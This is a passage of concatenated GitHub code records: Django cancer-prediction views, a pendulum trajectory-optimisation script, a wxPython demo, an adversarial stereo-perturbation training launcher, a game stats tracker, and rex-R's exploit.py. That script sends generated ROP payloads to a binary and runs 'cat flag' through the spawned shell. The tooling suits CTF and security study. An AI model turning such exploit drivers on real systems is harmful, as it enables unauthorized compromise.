Bizim amacımız görmeden tahmin etmesi \n model.fit(giris, cikis, epochs=10, batch_size=32, validation_split=0.20)\n # inputlar\n uniformity_cell_size = request.POST.get(\"uniformity_cell_size\")\n uniformity_cell_shape = request.POST.get(\"uniformity_cell_shape\")\n marginal_adhesion = request.POST.get(\"marginal_adhesion\")\n single_epithelial_cell_size = request.POST.get(\"single_epithelial_cell_size\")\n bare_nuclei = request.POST.get(\"bare_nuclei\")\n bland_chromatin = request.POST.get(\"bland_chromatin\")\n normal_nucleoli = request.POST.get(\"normal_nucleoli\")\n mitoses = request.POST.get(\"mitoses\")\n #a = 5\n #b = 5\n #c = 5\n #d = 8\n #e = 10\n #f = 8\n #g = 7\n #h = 3\n tahmin = np.array(\n [\n uniformity_cell_size,\n uniformity_cell_shape,\n marginal_adhesion,\n single_epithelial_cell_size,\n bare_nuclei,\n bland_chromatin,\n normal_nucleoli,\n mitoses\n ]\n ).reshape(1, 8)\n print(model.predict_classes(tahmin))\n result = model.predict_classes(tahmin)\n newCancer = Cancer(\n tc=tc,\n firstName=firstName,\n lastName=lastName,\n length=length,\n age=age,\n sex=sex,\n city=city,\n country=country,\n uniformity_cell_size=uniformity_cell_size,\n uniformity_cell_shape=uniformity_cell_shape,\n marginal_adhesion=marginal_adhesion,\n single_epithelial_cell_size=single_epithelial_cell_size,\n bare_nuclei=bare_nuclei,\n bland_chromatin=bland_chromatin,\n normal_nucleoli=normal_nucleoli,\n mitoses=mitoses,\n result = result\n )\n newCancer.save()\n return redirect(\"/cancer\")\n\n# Kayıt Silme\ndef deleteResult(request,id):\n cancer= get_object_or_404(Cancer, id = id)\n cancer.delete()\n return redirect(\"/cancer\")","repo_name":"Yigit-dev/Breast-Cancer-Detection-with-Artificial-Intelligence","sub_path":"Project/project/cancer/views-with-Comments.py","file_name":"views-with-Comments.py","file_ext":"py","file_size_in_byte":8533,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"16016986306","text":"import autograd.numpy as np\n\nimport gym\nfrom trajopt.gps import MBGPS\n\nimport matplotlib.pyplot as plt\n\nfrom joblib import Parallel, delayed\n\nimport multiprocessing\nnb_cores = multiprocessing.cpu_count()\n\n\ndef create_job(kwargs):\n import warnings\n warnings.filterwarnings(\"ignore\")\n\n # pendulum env\n env = gym.make('Pendulum-TO-v0')\n env._max_episode_steps = 10000\n env.unwrapped.dt = 0.02\n env.unwrapped.umax = np.array([2.5])\n env.unwrapped.periodic = False\n\n dm_state = env.observation_space.shape[0]\n dm_act = env.action_space.shape[0]\n\n state = env.reset()\n init_state = tuple([state, 1e-4 * np.eye(dm_state)])\n solver = MBGPS(env, init_state=init_state,\n init_action_sigma=25., nb_steps=300,\n kl_bound=.1, action_penalty=1e-3,\n activation={'shift': 250, 'mult': 0.5})\n\n solver.run(nb_iter=100, verbose=False)\n\n solver.ctl.sigma = np.dstack([1e-1 * np.eye(dm_act)] * 300)\n data = solver.rollout(nb_episodes=1, stoch=True, init=state)\n\n obs, act = np.squeeze(data['x'], axis=-1).T, np.squeeze(data['u'], axis=-1).T\n return obs, act\n\n\ndef parallel_gps(nb_jobs=50):\n kwargs_list = [{} for _ in range(nb_jobs)]\n results = Parallel(n_jobs=min(nb_jobs, 20),\n verbose=10, backend='loky')(map(delayed(create_job), kwargs_list))\n obs, act = list(map(list, zip(*results)))\n return obs, act\n\n\nobs, act = parallel_gps(nb_jobs=50)\n\nplt.figure()\nfig, ax = plt.subplots(nrows=3, ncols=1, figsize=(12, 4))\nfor _obs, _act in zip(obs, act):\n ax[0].plot(_obs[:, :-1])\n ax[1].plot(_obs[:, -1])\n ax[2].plot(_act)\nplt.show()\n\nimport pickle\ndata = {'obs': obs, 'act': act}\npickle.dump(data, open(\"gps_pendulum_other.pkl\", \"wb\"))\n","repo_name":"hanyas/trajopt","sub_path":"examples/gps/analytical/topt/mb_pendulum_parallel.py","file_name":"mb_pendulum_parallel.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"16"}
+{"seq_id":"35353236233","text":"import wx\n\nclass MyApp(wx.App):\n\tdef OnInit(self):\n\t\tmyframe = wx.Frame(None,-1,'test')\n\t\tmytext = wx.TextCtrl(myframe,-1,style=wx.TE_READONLY)\t# we display the selection in it\n\t\tmytree = wx.TreeCtrl(myframe,-1,style=wx.TR_HAS_BUTTONS|wx.TR_SINGLE)\t# only one item can be selected !\n\t\trootItem = mytree.AddRoot('Root')\n\t\t# populate the tree\n\t\tfor i in range(10):\n\t\t\ttmpkey = 'key_%s'%i\n\t\t\titem = mytree.AppendItem(rootItem,tmpkey)\n\t\t\tfor j in range(10):\n\t\t\t\tmytree.AppendItem(item,'tmpkey_%s'%j)\n\t\tmytree.Expand(rootItem)\n\t\t# set events\n\t\twx.EVT_TREE_BEGIN_DRAG(mytree,mytree.GetId(),lambda evt: evt.Allow())\n\t\twx.EVT_TREE_SEL_CHANGED(mytree,mytree.GetId(),lambda evt: mytext.SetValue(mytree.GetItemText(mytree.GetSelection())))\n\t\t# layout\n\t\ts = wx.BoxSizer(wx.HORIZONTAL)\n\t\ts.Add(mytree,1,wx.EXPAND)\n\t\ts.Add(mytext,0,0)\n\t\tmyframe.SetSizer(s)\n\t\tmyframe.Layout()\n\t\t# show the window\n\t\tmyframe.Show()\n\t\treturn True\n\t\t\nmyApp = MyApp()\nmyApp.MainLoop()\n\n \t \t \n","repo_name":"wxWidgets/trac-attachments","sub_path":"ticket/487/4874f491eab06ba3e0df4386a569fb51c7c548f1/4676e4b7e18c6e5b69d91d7e1aad3ac80ba68931.py","file_name":"4676e4b7e18c6e5b69d91d7e1aad3ac80ba68931.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"13745041989","text":"'''\nAuthor: Zachery Berger , Parth Agrawal , Tian Yu Liu , Alex Wong \nIf you use this code, please cite the following paper:\n\nZ. Berger, P. Agrawal, T. Liu, S. Soatto, and A. Wong. Stereoscopic Universal Perturbations across Different Architectures and Datasets.\nhttps://arxiv.org/pdf/2112.06116.pdf\n\n@inproceedings{berger2022stereoscopic,\n title={Stereoscopic Universal Perturbations across Different Architectures and Datasets},\n author={Berger, Zachery and Agrawal, Parth and Liu, Tian Yu and Soatto, Stefano and Wong, Alex},\n booktitle={Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition},\n year={2022}\n}\n'''\n\nimport argparse\nimport global_constants as settings\nfrom perturb_main import train\n\n\nparser = argparse.ArgumentParser()\n\n# Training and validation input filepaths\nparser.add_argument('--train_image0_path',\n type=str, required=True, help='Path to list of left image paths')\nparser.add_argument('--train_image1_path',\n type=str, required=True, help='Path to list of right image paths')\nparser.add_argument('--train_pseudo_ground_truth_path',\n type=str, default=None, help='Path to list of ground truth disparity paths')\nparser.add_argument('--val_image0_path',\n type=str, default=None, help='Path to list of left image paths')\nparser.add_argument('--val_image1_path',\n type=str, default=None, help='Path to list of right image paths')\nparser.add_argument('--val_ground_truth_path',\n type=str, default=None, help='Path to list of ground truth disparity paths')\n\n# Perturbation model settings\nparser.add_argument('--n_image_height',\n type=int, default=settings.N_IMAGE_HEIGHT, help='Height of each sample')\nparser.add_argument('--n_image_width',\n type=int, default=settings.N_IMAGE_WIDTH, help='Width of each sample')\nparser.add_argument('--output_norm',\n type=float, default=settings.OUTPUT_NORM, help='Output norm of noise')\nparser.add_argument('--gradient_scale',\n type=float, default=settings.GRADIENT_SCALE, help='Value to scale gradients by')\nparser.add_argument('--attack',\n type=str, default=settings.ATTACK, help='Perturbation attack method: [full, tile]')\nparser.add_argument('--n_perturbation_height',\n type=int, default=settings.N_PERTURBATION_HEIGHT, help='Height of perturbation')\nparser.add_argument('--n_perturbation_width',\n type=int, default=settings.N_PERTURBATION_WIDTH, help='Width of perturbation')\n\n# Optimization settings\nparser.add_argument('--n_batch',\n type=int, default=settings.N_BATCH, help='Number of samples per batch')\nparser.add_argument('--n_epoch',\n type=int, default=settings.N_EPOCH, help='Number of samples per batch')\n\n# Stereo model settings\nparser.add_argument('--stereo_method',\n type=str, default=settings.STEREO_METHOD, help='Stereo method available: %s' % settings.STEREO_METHOD_AVAILABLE)\nparser.add_argument('--stereo_model_restore_path',\n type=str, default='', help='Path to restore model checkpoint')\nparser.add_argument('--num_deform_layers',\n type=int, default=0, help='Number of deformable convolution layers [0, 6, 25]')\n\n# Checkpoint settings\nparser.add_argument('--n_checkpoint',\n type=int, default=settings.N_CHECKPOINT, help='Number of steps before saving a checkpoint')\nparser.add_argument('--checkpoint_path',\n type=str, required=True, help='Path to save checkpoints')\n\n# Hardware settings\nparser.add_argument('--n_worker',\n type=int, default=settings.N_WORKER, help='Number of workers/threads to use')\nparser.add_argument('--device',\n 
type=str, default=settings.DEVICE, help='Device to use: gpu, cpu')\n\n\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n\n args.stereo_method = args.stereo_method.lower()\n\n args.device = args.device.lower()\n\n if args.device not in [settings.GPU, settings.CPU, settings.CUDA]:\n args.device = settings.CUDA\n\n args.device = settings.CUDA if args.device == settings.GPU else args.device\n\n train(train_image0_path=args.train_image0_path,\n train_image1_path=args.train_image1_path,\n train_pseudo_ground_truth_path=args.train_pseudo_ground_truth_path,\n val_image0_path=args.val_image0_path,\n val_image1_path=args.val_image1_path,\n val_ground_truth_path=args.val_ground_truth_path,\n # Perturbation model settings\n n_image_height=args.n_image_height,\n n_image_width=args.n_image_width,\n output_norm=args.output_norm,\n gradient_scale=args.gradient_scale,\n attack=args.attack,\n n_perturbation_height=args.n_perturbation_height,\n n_perturbation_width=args.n_perturbation_width,\n # Optimization settings\n n_batch=args.n_batch,\n n_epoch=args.n_epoch,\n # Stereo model settings\n stereo_method=args.stereo_method,\n stereo_model_restore_path=args.stereo_model_restore_path,\n num_deform_layers=args.num_deform_layers,\n # Checkpoint settings\n n_checkpoint=args.n_checkpoint,\n checkpoint_path=args.checkpoint_path,\n # Hardware settings\n n_worker=args.n_worker,\n device=args.device)\n","repo_name":"alexklwong/stereoscopic-universal-perturbations","sub_path":"src/train_perturb_model.py","file_name":"train_perturb_model.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"16"}
+{"seq_id":"1425350306","text":"# D3 12649 N Castle\n# 아직 x\n\ndef dfs(level):\n # 현재 level 에서 선택할수 있는 x 좌표는 0 1 2\n if level == N :\n de = - 1\n return\n for x in range(N):\n if used[x] == 1 :\n continue\n used[x] = 1 # x좌표 사용(이후의 재귀호출에서 재사용 방지)\n dfs(level+1)\n used[x] = 0 # 원상복구\n return\n \nfor _ in range(10):\n N = int(input())\n dfs(N)\n\nused = [0] * N # 0 1 2 의 사용 여부\n\n\n","repo_name":"hhongjj/Algorithm","sub_path":"SWEA/D3/D3_12649_NCastle.py","file_name":"D3_12649_NCastle.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"18581653828","text":"from .x86_attack.init import *\nfrom .x86_attack.analyze import *\nimport sys\nfrom .x86_attack.shell_craft import *\n\nif __name__ == '__main__':\n info = {}\n lcs = {}\n rop_and_index = {}\n payload = []\n flag = []\n binary = sys.argv[1]\n crash_file = sys.argv[2]\n f = open(crash_file, 'r')\n crash = f.read()\n f.close()\n\n init = init(binary, crash_file)\n info = init.get_state()\n #print INFO\n\n analyze = analyze(info, binary, crash)\n lcs = analyze.find_lcs()\n if lcs == -1:\n sys.exit(0)\n rop_and_index = analyze.calc_index()\n\n shell = shell_craft(binary, crash, rop_and_index, info)\n payload = shell.create_payload()\n\n for i in payload:\n p = process(binary)\n\n p.sendline(i)\n p.sendline('echo zxcv;cat flag;')\n try:\n p.recvuntil('zxcv\\n')\n flag.append(p.recvuntil('}'))\n p.close()\n except:\n p.close()\n pass\n\n for i in flag:\n if i is not '':\n log.info(i)\n\n\n\n\n\n\n\n","repo_name":"t3ls/rex-r","sub_path":"rexR-V1.0.5-release/x86_attack/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"}
+{"seq_id":"12904739789","text":"\"\"\"\nThis module defines how variables are tracked in order to send to Max via OSC.\n\nThere are various Stat objects that record specific types of variables or record variables\nin specific ways, as well as the StatManager object which defines all stats to record and send.\n\nAuthor: Gregg Oliva\n\"\"\"\n\n# stdlib imports\nfrom typing import Any, Dict, List, Union\n\n# project imports\nimport debug\nfrom defs import (\n SCREEN_WIDTH,\n SCREEN_HEIGHT,\n PROJECTILE_TYPES,\n REST, NUM_VOICES,\n FPS,\n RECORD_MUSIC\n)\nfrom osc_client import osc, OSCHandler\n\n\nclass Stat:\n \"\"\"A simple Number Stat to be sent via OSC\"\"\"\n def __init__(self, value: Any, send: bool = True) -> None:\n self.value = value\n self.send = send\n\n def update(self, value: Any) -> None:\n \"\"\"Set the value of this stat to a different object\"\"\"\n self.value = value\n\n def __add__(self, other) -> \"Stat\":\n stat = Stat(self.value + other.value, self.send) \\\n if isinstance(other, Stat) \\\n else Stat(self.value + other, self.send)\n\n return stat\n\n def __sub__(self, other) -> \"Stat\":\n stat = Stat(self.value - other.value, self.send) \\\n if isinstance(other, Stat) \\\n else Stat(self.value - other, self.send)\n\n return stat\n\n def __mul__(self, other) -> \"Stat\":\n stat = Stat(self.value * other.value, self.send) \\\n if isinstance(other, Stat) \\\n else Stat(self.value * other, self.send)\n\n return stat\n\n def __div__(self, other) -> \"Stat\":\n stat = Stat(self.value / other.value, self.send) \\\n if isinstance(other, Stat) \\\n else Stat(self.value / other, self.send)\n\n return stat\n\n def __truediv__(self, other) -> \"Stat\":\n return self.__div__(other)\n\n def __lt__(self, other) -> bool:\n return self.value < other.value \\\n if isinstance(other, Stat) \\\n else self.value < other\n\n def __le__(self, other) -> bool:\n return self.value <= other.value \\\n if isinstance(other, Stat) \\\n else self.value <= other\n\n def __eq__(self, other) -> bool:\n return self.value == other.value \\\n if isinstance(other, Stat) \\\n else self.value == other\n\n def __ne__(self, other) -> bool:\n return self.value != other.value \\\n if isinstance(other, Stat) \\\n else self.value != other\n\n def __gt__(self, other) -> bool:\n return self.value > other.value \\\n if isinstance(other, Stat) \\\n else self.value > other\n\n def __ge__(self, other) -> bool:\n return self.value >= other.value \\\n if isinstance(other, Stat) \\\n else self.value >= other\n\n def __str__(self) -> str:\n return str(self.value)\n\n def __repr__(self) -> str:\n return str(f'Stat(Value={self.value}, OSC={self.send})')\n\n\nclass TextStat:\n \"\"\"A stat that tracks strings\"\"\"\n def __init__(self, initial_text: str = '', send: bool = True) -> None:\n self.text = initial_text\n self.send = send\n\n def update(self, text: str) -> None:\n \"\"\"Update the string\"\"\"\n self.text = text\n\n def __str__(self) -> str:\n return self.text\n\n def __repr__(self) -> str:\n return str(f'TextStat(Text={self.text})')\n\n\nclass TimeStat:\n \"\"\"A stat that tracks time in ms, seconds, minutes, and hours\"\"\"\n def __init__(self, total_ms, send: bool = True) -> None:\n self.total_ms = total_ms\n self.send = send\n\n seconds, self.ms = divmod(self.total_ms, 1000)\n minutes, self.seconds = divmod(seconds, 60)\n self.hours, self.minutes = divmod(minutes, 60)\n\n @property\n def time(self):\n \"\"\"Represents Time as a tuple of Hours, Minutes, Seconds, and Ms\"\"\"\n return (self.hours, self.minutes, 
self.seconds, self.ms)\n\n @property\n def time_display(self) -> str:\n \"\"\"\n Display the time in a format that makes sense with how much time has ellapsed.\n e.g. as (4 minutes 32 seconds), (24 seconds), (1 hour 3 minutes 10 seconds),\n\n This function is useful for displaying Time Stats in the DEATH MENU\n \"\"\"\n time_str = [f'{self.seconds} Seconds']\n if self.minutes > 0:\n time_str.insert(0, f'{self.minutes} Minutes')\n if self.hours > 0:\n time_str.insert(0, f'{self.hours} Hours')\n return ' '.join(time_str)\n\n def __sub__(self, other) -> \"TimeStat\":\n if isinstance(other, TimeStat):\n return TimeStat(self.total_ms - other.total_ms)\n elif isinstance(other, (int, float)):\n return TimeStat(self.total_ms - other)\n else:\n raise TypeError(f'{self.__class__} unable to perform subtraction with type: {type(other)}')\n\n def __str__(self) -> str:\n return str(self.total_ms)\n\n def __repr__(self) -> str:\n return str(f'TimeStat(Hours={self.hours}, Minutes={self.minutes}, Seconds={self.seconds}, Milliseconds={self.ms})')\n\n\nclass TrackerStat:\n \"\"\"\n Tracks information about a numerical Stat that changes/updates frequently.\n\n Tracks the following:\n 1) Min. value recorded\n 2) Avg. of all values recorded\n 3) The most recent value recorded\n 4) Max. value recorded\n 5) Total number of values recorded\n\n \"\"\"\n def __init__(self, send_mode: int = 0, send: bool = True) -> None:\n self.sum = 0\n self.last = 0\n self.count = 0\n self.min = float('inf')\n self.max = float('-inf')\n\n if send_mode > len(self.list):\n send_mode = 0\n\n self.send_mode = send_mode\n self.send = send\n\n @property\n def avg(self) -> float:\n \"\"\"\n Calculate the average of all tracked values\n \"\"\"\n if self.count > 0:\n return self.sum / self.count\n else:\n return 0\n\n @property\n def list(self) -> List:\n \"\"\"\n All tracked values as a List\n \"\"\"\n return [self.min, self.avg, self.last, self.max, self.count]\n\n @property\n def value(self) -> Union[int, float, List]:\n \"\"\"\n Returns one or more of the tracked values depending on the send_mode\n\n send_mode = 0: Return all tracked values as a list\n send_mode = 1: Return the min\n send_mode = 2: Return the avg\n send_mode = 3: Return the most recent\n send_mode = 4: Return the max\n send_mode = 5: Return the count\n \"\"\"\n if self.send_mode == 0:\n return self.list\n\n return self.list[self.send_mode - 1]\n\n def add(self, val: float):\n \"\"\"\n Add a new value to be tracked\n \"\"\"\n self.last = val\n self.sum += val\n self.count += 1\n if val > self.max:\n self.max = val\n if val < self.min:\n self.min = val\n\n def __str__(self) -> str:\n return str(self.avg)\n\n def __repr__(self) -> str:\n return str(f'TrackerStat(Average={self.avg}, Last={self.last} Count={self.count}, Min={self.min}, Max={self.max})')\n\n\nclass CounterStat:\n \"\"\"A stat that maps strings to counts\"\"\"\n def __init__(self, init_values: List[str] = None, send: bool = True) -> None:\n self._items = {} if init_values is None else {key: 0 for key in init_values}\n self.count = 0\n self.send = send\n\n @property\n def items(self) -> List[Union[str, int]]:\n \"\"\"\n Returns a List of tuple pairs: (item_str, item_count)\n \"\"\"\n items_list = []\n for key, val in self._items.items():\n items_list.extend([key, val])\n return items_list\n\n def get(self, item: str) -> int:\n \"\"\"Get an item by name\"\"\"\n return self._items[item]\n\n def increase(self, item: str) -> None:\n \"\"\"Increase the value of an item, or add the item to the map\"\"\"\n if item not 
in self._items:\n self._items[item] = 1\n else:\n self._items[item] += 1\n\n self.count += 1\n\n\nclass ListStat:\n \"\"\"A stat that tracks Lists\"\"\"\n def __init__(self, initial_length: int = 0, initial_fill: int = 0, send: bool = True) -> None:\n self.list = [initial_fill for _ in range(initial_length)]\n self.send = send\n\n def add_at_index(self, index: int, val: int):\n \"\"\"Increase the value at the index by one\"\"\"\n self.list[index] += val\n\n def update(self, *vals: int):\n \"\"\"Update the entire list to equal this new list\"\"\"\n for idx, val in enumerate(vals):\n self.list[idx] = val\n\n def get(self, index: int) -> Stat:\n \"\"\"Return an element from the list at the given index\"\"\"\n return Stat(self.list[index])\n\n def __str__(self) -> str:\n return str(', '.join(self.list))\n\n def __repr__(self) -> str:\n return str(f'ListStat(List={self.list})')\n\n\nclass StatTracker:\n \"\"\"\n Tracks all game information as Stats.\n\n Displays some of these stats at the end DEATH MENU.\n\n Sends relevant stats over OSC at the provided port.\n \"\"\"\n\n OUTPUT_STATS_FORMAT = [\n 'SCORE: {buffer}{value}',\n 'ENEMIES KILLED: {buffer}{value}',\n 'PLAYER ACCURACY: {buffer}{value}%',\n 'PLAYER HEALTH LOST: {buffer}{value}',\n 'NOTES RECOVERED: {buffer}{value}',\n 'UPGRADES PICKED UP: {buffer}{value}',\n 'TIME SURVIVED: {buffer}{value}',\n 'TOTAL TIME PLAYED: {buffer}{value}',\n ]\n\n def __init__(self, osc: OSCHandler) -> None:\n self.osc = osc\n\n # Stats that track throughout each playthrough\n self.control__max_init = Stat(0)\n self.control__game_init = Stat(0)\n self.control__menu_init = Stat(0)\n self.control__max_quit = Stat(0)\n self.control__output_device = TextStat()\n self.control__fps = Stat(FPS)\n self.control__num_voices = Stat(NUM_VOICES)\n self.control__screen_width = Stat(SCREEN_WIDTH)\n self.control__screen_height = Stat(SCREEN_HEIGHT)\n self.control__record_music = Stat(RECORD_MUSIC)\n\n self.game__play_count = Stat(0)\n self.game__time__total_played = TimeStat(0)\n\n def init_new_playthrough(self, start_time_ms: int = 0, player_max_health: int = 0):\n \"\"\"Reset Stats on a new Playthrough\"\"\"\n\n # Time trackers\n self.start_time = start_time_ms\n self.time_last_enemy_killed = start_time_ms\n self.time_player_last_hit = start_time_ms\n self.time_last_collected_note = start_time_ms\n\n self.control__game_init = Stat(0)\n self.control__menu_init = Stat(0)\n self.control__reset_music = Stat(0)\n\n self.game__score = Stat(0)\n self.game__total_frames = Stat(0)\n self.game__time__current_playthrough = TimeStat(0)\n self.game__num_events = Stat(0)\n self.game__percent__note_over_enemy_score = Stat(50.)\n\n self.player__starting_position = ListStat(initial_length=2)\n self.player__starting_angle = Stat(0)\n self.player__position = ListStat(initial_length=2)\n self.player__vertical_half = TextStat()\n self.player__horizontal_half = TextStat()\n self.player__frames__moving_and_rotating = Stat(0)\n self.player__frames__moving = Stat(0)\n self.player__frames__still = Stat(0)\n self.player__frames__rotating = Stat(0)\n self.player__frames__firing = Stat(0)\n self.player__frames__per_screen_quadrant = ListStat(initial_length=4)\n self.player__frames__per_angle_quadrant = ListStat(initial_length=4)\n self.player__percent__firing_weapon = Stat(0.)\n self.player__percent__moving_over_rotating = Stat(50.)\n self.player__percent__moving_and_rotating = Stat(50.)\n self.player__percent__health_lost_over_gained = Stat(50.)\n self.player__percent__dodges_over_enemy_collision = 
Stat(50.)\n self.player__percent__hit_rests_over_accidentals = Stat(50.)\n self.player__percent__missed_notes_over_dodges = Stat(50.)\n self.player__curr_velocity = ListStat(initial_length=2)\n self.player__curr_speed = Stat(0)\n self.player__angle = Stat(0)\n self.player__last_rotation_direction = Stat(0)\n self.player__percent__accuracy = Stat(0.0)\n self.player__time__between_kills = TrackerStat()\n self.player__time__between_getting_hit = TrackerStat()\n self.player__max_health = Stat(player_max_health)\n self.player__curr_health = Stat(player_max_health)\n self.player__health_lost = Stat(0)\n self.player__health_gained = Stat(0)\n self.player__projectile_hit_count = CounterStat(PROJECTILE_TYPES)\n self.player__hit_distance = TrackerStat()\n self.player__enemies_collided = Stat(0)\n self.player__dodges = Stat(0)\n self.player__missed_nearby_notes = Stat(0)\n self.player__alive_projectiles = Stat(0)\n\n self.notes__collected = Stat(0)\n self.notes__total = Stat(0)\n self.notes__score = Stat(0)\n self.notes__time__between_collecting = TrackerStat()\n self.notes__time__lifespan = TrackerStat()\n self.notes__percent__collected = Stat(0)\n\n self.weapon__selected = Stat(0)\n self.weapon__total_shots_fired = Stat(0)\n self.weapon__shots_per_weapon = ListStat(initial_length=2)\n self.weapon__hits_per_weapon = ListStat(initial_length=2)\n self.weapon__frames__per_weapon = ListStat(initial_length=2)\n self.weapon__percent__one_over_two = Stat(0)\n\n self.upgrades__total_dropped = Stat(0)\n self.upgrades__picked_up = Stat(0)\n self.upgrades__missed = Stat(0)\n self.upgrades__time__between_collecting = TrackerStat()\n self.upgrades__time__lifespan = TrackerStat()\n self.upgrades__percent__collected = Stat(0)\n\n self.enemies__total = Stat(0)\n self.enemies__standard_count = Stat(0)\n self.enemies__special_count = Stat(0)\n self.enemies__num_on_screen = TrackerStat(0)\n self.enemies__hit = Stat(0)\n self.enemies__killed = Stat(0)\n self.enemies__hit_distance = TrackerStat()\n self.enemies__alive_projectiles = Stat(0)\n self.enemies__score = Stat(0)\n self.enemies__time__lifespan = TrackerStat()\n\n self.game__play_count += 1\n\n def send_stats(self):\n \"\"\"Send all stats over OSC\"\"\"\n osc_stats = self.convert_osc_stats_to_dict()\n self.osc.union_bundle(osc_stats)\n if not debug.DISABLE_OSC_SEND:\n self.osc.send_full_bundle()\n\n def update_stats(self):\n \"\"\"Update stats based on other stats\"\"\"\n # Update score\n self.game__score = self.enemies__score + self.notes__score\n\n # Update player accuracy\n if self.weapon__total_shots_fired > 0:\n self.player__percent__accuracy = (self.enemies__hit / self.weapon__total_shots_fired) * 100\n\n # Update player position stats\n horizontal_half = \"left\" if self.player__position.list[0] < SCREEN_WIDTH / 2 else \"right\"\n vertical_half = \"top\" if self.player__position.list[1] < SCREEN_HEIGHT / 2 else \"bottom\"\n self.player__horizontal_half.update(horizontal_half)\n self.player__vertical_half.update(vertical_half)\n\n if vertical_half == \"top\":\n # top left == quadrant 0\n if horizontal_half == \"left\":\n self.player__frames__per_screen_quadrant.add_at_index(0, 1)\n # top right == quadrant 1\n else:\n self.player__frames__per_screen_quadrant.add_at_index(1, 1)\n else:\n # bottom left == quadrant 2\n if horizontal_half == \"left\":\n self.player__frames__per_screen_quadrant.add_at_index(2, 1)\n # bottom right == quadrant 3\n else:\n self.player__frames__per_screen_quadrant.add_at_index(3, 1)\n\n # Update movement vs rotating vs non-movement 
ratio\n total = self.player__frames__moving + self.player__frames__rotating\n if total > 0:\n self.player__percent__moving_over_rotating = (self.player__frames__moving / total) * 100\n\n # Update movement and rotating vs just movement or just rotation\n total = self.player__frames__moving + self.player__frames__rotating + self.player__frames__moving_and_rotating\n if total > 0:\n self.player__percent__moving_and_rotating = (self.player__frames__moving_and_rotating / total) * 100\n\n # Update firing vs not ratio\n if self.game__total_frames > 0:\n self.player__percent__firing_weapon = (self.player__frames__firing / self.game__total_frames) * 100\n\n # Upgrade percentage\n if self.upgrades__total_dropped > 0:\n self.upgrades__percent__collected = (self.upgrades__picked_up / self.upgrades__total_dropped) * 100\n\n if self.notes__total > 0:\n self.notes__percent__collected = (self.notes__collected / self.notes__total) * 100\n\n # Update weapon usage\n if self.weapon__total_shots_fired > 0:\n self.weapon__percent__one_over_two = \\\n (self.weapon__shots_per_weapon.get(0) / self.weapon__total_shots_fired) * 100\n\n # Health lost vs gained\n total = self.player__health_lost + self.player__health_gained\n if total > 0:\n self.player__percent__health_lost_over_gained = (self.player__health_lost / total) * 100\n\n # Dodges vs enemy collisions\n total = self.player__dodges + self.player__enemies_collided\n if total > 0:\n self.player__percent__dodges_over_enemy_collision = (self.player__dodges / total) * 100\n\n # Missed notes vs dodges\n total = self.player__missed_nearby_notes + self.player__dodges\n if total > 0:\n self.player__percent__missed_notes_over_dodges = (self.player__missed_nearby_notes / total) * 100\n\n # Rests vs accidentals\n projectile_hit_count = self.player__projectile_hit_count.count\n if projectile_hit_count > 0:\n num_rests = self.player__projectile_hit_count.get(REST)\n self.player__percent__hit_rests_over_accidentals.update((num_rests / projectile_hit_count) * 100)\n\n # Note vs enemy score\n if self.game__score > 0:\n self.game__percent__note_over_enemy_score = (self.notes__score / self.game__score) * 100\n\n def convert_osc_stats_to_dict(self) -> Dict[str, Any]:\n \"\"\"Convert stats into a dictionary to be used by the OSC manager\"\"\"\n stat_dict = {}\n\n for stat_name, stat in self.__dict__.items():\n if not hasattr(stat, 'send') or not stat.send:\n continue\n\n if isinstance(stat, Stat):\n stat_dict[stat_name] = stat.value\n elif isinstance(stat, TimeStat):\n stat_dict[stat_name] = stat.time\n elif isinstance(stat, TrackerStat):\n stat_dict[stat_name] = stat.value\n elif isinstance(stat, ListStat):\n stat_dict[stat_name] = stat.list\n elif isinstance(stat, TextStat):\n stat_dict[stat_name] = stat.text\n elif isinstance(stat, CounterStat):\n stat_dict[stat_name] = stat.items\n\n return stat_dict\n\n def set_game_time(self, total_time_elapsed_ms: int):\n \"\"\"Set the time that a new game playthrough begins\"\"\"\n # calculate playthrough time\n playthrough_time_elapsed = total_time_elapsed_ms - self.start_time\n self.game__time__current_playthrough = TimeStat(playthrough_time_elapsed)\n\n # calculate total time\n self.game__time__total_played = TimeStat(total_time_elapsed_ms)\n\n def print_stats(self):\n \"\"\"Print Stats to the console\"\"\"\n print(f'---- Game {self.game__play_count} ----')\n print(f'Score: {self.game__score}')\n print(f'Enemies Killed: {self.enemies__killed}')\n print(f'Enemy shots dodged: {self.player__dodges}')\n print(f'Avg time to kill an Enemy: 
{self.player__time__between_kills.avg / 1000}')\n print(f'Total Shots Fired: {self.weapon__total_shots_fired}')\n print(f'Enemies Hit: {self.enemies__hit}')\n print(f'Player Shot Accuracy: {self.player__percent__accuracy}%')\n print(\n f'Time Survived: {self.game__time__current_playthrough.hours} Hours, '\n f'{self.game__time__current_playthrough.minutes} Minutes, '\n f'{self.game__time__current_playthrough.seconds} Seconds'\n )\n print(\n f'Total Time Played: {self.game__time__total_played.hours} Hours, '\n f'{self.game__time__total_played.minutes} Minutes, '\n f'{self.game__time__total_played.seconds} Seconds'\n )\n print()\n\n def get_endgame_stats(self) -> str:\n \"\"\"Formats the endgame stats text to be displayed during the DEATH MENU\"\"\"\n stats_to_report = [\n self.game__score,\n self.enemies__killed,\n int(self.player__percent__accuracy.value),\n self.player__health_lost,\n self.notes__collected,\n self.upgrades__picked_up,\n self.game__time__current_playthrough.time_display,\n self.game__time__total_played.time_display,\n ]\n\n # Format lines without buffer\n stats_str_no_buffer = [\n stat_str.format(buffer=0, value=stats_to_report[idx])\n for idx, stat_str in enumerate(self.OUTPUT_STATS_FORMAT)\n ]\n\n # Calculate buffer for each line\n longest_line = len(max(stats_str_no_buffer, key=len))\n buffer_per_line = [\n ' ' * (longest_line - len(line)) for line in stats_str_no_buffer\n ]\n\n # Re-format lines with 